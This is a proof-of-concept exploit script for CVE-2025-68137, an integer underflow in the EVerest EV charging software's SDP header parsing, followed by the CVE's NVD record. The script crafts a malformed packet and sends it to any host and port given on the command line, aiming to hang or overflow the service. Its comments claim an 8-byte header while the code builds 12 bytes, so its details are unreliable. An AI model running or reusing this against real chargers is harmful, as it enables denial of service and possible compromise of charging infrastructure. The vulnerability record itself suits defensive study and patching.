CVE-2025-68137

#!/usr/bin/env python3 """ CVE-2025-68137 PoC - EVerest SdpPacket::parse_header() Integer Underflow This PoC demonstrates the integer underflow in SdpPacket::parse_header() that leads to SIZE_MAX being used as buffer length. """ import socket import struct def create_malicious_sdp_packet(): """ Craft a malicious SDP packet that triggers the integer underflow. The header indicates 8 bytes total (complete header), but the internal buffer length is set to 7, causing remaining_length = 7 - 8 = -1 which becomes SIZE_MAX when interpreted as size_t. """ # SDP packet header structure (8 bytes) # The key is that header_length == current_buffer_length # which causes the underflow: remaining = 7 - 8 = -1 -> SIZE_MAX packet = bytearray() # Version and message type (1 byte) packet.append(0x01) # SDP version 1 # Message type: 0x01 = HELLO, 0x02 = HELLO_V2, etc. packet.append(0x01) # HELLO message type # Flags (2 bytes) - some implementations use this packet.extend(struct.pack('>H', 0x0000)) # Sequence number (4 bytes) packet.extend(struct.pack('>I', 0x00000001)) # Payload length (4 bytes) - set to 0 to trigger the condition packet.extend(struct.pack('>I', 0x00000000)) # Padding or additional header bytes to reach exactly 8 bytes # This ensures header_length = 8, but internal buffer = 7 # The exact exploitation depends on implementation details return bytes(packet) def send_exploit(target_host, target_port): """Send the exploit payload to the target EVerest service.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) payload = create_malicious_sdp_packet() print(f"[*] Sending payload ({len(payload)} bytes)...") sock.send(payload) print("[*] Payload sent. Waiting for response...") # If vulnerable, server will hang (DoS) or crash (overflow) response = sock.recv(1024) print(f"[+] Received: {response.hex()}") sock.close() return True except socket.timeout: print("[-] Connection timed out - possible DoS condition (infinite loop)") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_host> <target_port>") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) print(f"[*] CVE-2025-68137 PoC for EVerest") print(f"[*] Target: {target}:{port}") send_exploit(target, port)

{"cve": {"id": "CVE-2025-68137", "sourceIdentifier": "[email protected]", "published": "2026-01-21T20:16:05.840", "lastModified": "2026-02-06T21:21:52.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. Prior to version 2025.10.0, an integer overflow occurring in `SdpPacket::parse_header()` allows the current buffer length to be set to 7 after a complete header of size 8 has been read. The remaining length to read is computed using the current length subtracted by the header length which results in a negative value. This value is then interpreted as `SIZE_MAX` (or slightly less) because the expected type of the argument is `size_t`. Depending on whether the server is plain TCP or TLS, this leads to either an infinite loop or a stack buffer overflow. Version 2025.10.0 fixes the issue."}, {"lang": "es", "value": "EVerest es una pila de software de carga de vehículos eléctricos. Antes de la versión 2025.10.0, un desbordamiento de entero que ocurre en 'SdpPacket::parse_header()' permite que la longitud actual del búfer se establezca en 7 después de que se haya leído un encabezado completo de tamaño 8. La longitud restante a leer se calcula utilizando la longitud actual restada de la longitud del encabezado, lo que resulta en un valor negativo. Este valor se interpreta entonces como 'SIZE_MAX' (o ligeramente menos) porque el tipo esperado del argumento es 'size_t'. Dependiendo de si el servidor es TCP plano o TLS, esto conduce a un bucle infinito o a un desbordamiento de búfer de pila. La versión 2025.10.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}, {"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.10.0", "matchCriteriaId": "94E1768A-FED9-477E-A4B7-99FD10058D23"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-7qq4-q9r8-wc7w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}